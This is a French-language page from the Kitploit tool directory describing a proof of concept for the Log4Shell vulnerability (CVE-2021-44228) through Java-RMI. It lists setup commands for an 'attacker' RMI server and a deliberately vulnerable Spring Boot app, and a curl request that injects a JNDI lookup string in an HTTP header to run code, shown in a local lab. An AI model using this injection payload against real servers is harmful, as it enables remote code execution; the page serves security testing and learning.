Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4shell-rmi-poc — Une preuve de concept des vulnérabilités Log4j (CVE-2021-44228) via Java-RMI | Kitploit
Outils/GitHubGitHub/labout/log4shell-rmi-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHublabout/log4shell-rmi-poc

log4shell-rmi-poc

Une preuve de concept des vulnérabilités Log4j (CVE-2021-44228) via Java-RMI

Voir le dépôt
84il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

log4shell-rmi-poc

Une preuve de concept de la vulnérabilité Log4j (CVE-2021-44228) via Java-RMI
Elle utilise Log4j 2.5.7 depuis spring-boot-starter-log4j2

Prérequis :

Testé avec Java 8 (JDK 1.8.0_25) et Java 11 (JDK 11.0.1)

Comment exécuter la POC

1. Cloner le dépôt :

root@kitploit:~
git clone https://github.com/Labout/log4shell-rmi-poc.git

2. Démarrer le serveur RMI attaquant

root@kitploit:~
cd Log4jshell_rmi_server

./mvnw clean package

java -jar target/Log4jshell.rmi.server-0.0.1-SNAPSHOT.jar

Vous devriez obtenir quelque chose comme ceci :

rmi server

3. Démarrer l'application Log4j vulnérable (ici une application Spring Boot)

Dans un nouveau terminal

root@kitploit:~
cd vulnerabel_log4j_app

./mvnw clean package

java -jar target/vulnerabel_log4j_app-0.0.1-SNAPSHOT.jar

4. Injecter un JNDI vulnérable via l'en-tête "Accept-Version"

root@kitploit:~
curl 'http://localhost:8080/hello' --header 'Accept-Version: ${jndi:rmi://127.0.0.1:1099/ExecByEL}'

Comme vous pouvez le voir, l'application vulnérable appelle l'application Calculatrice.

exploit

Références

https://www.cisecurity.org/log4j-zero-day-vulnerability-response/
https://www.lunasec.io/docs/blog/log4j-zero-day/

Télécharger l’outil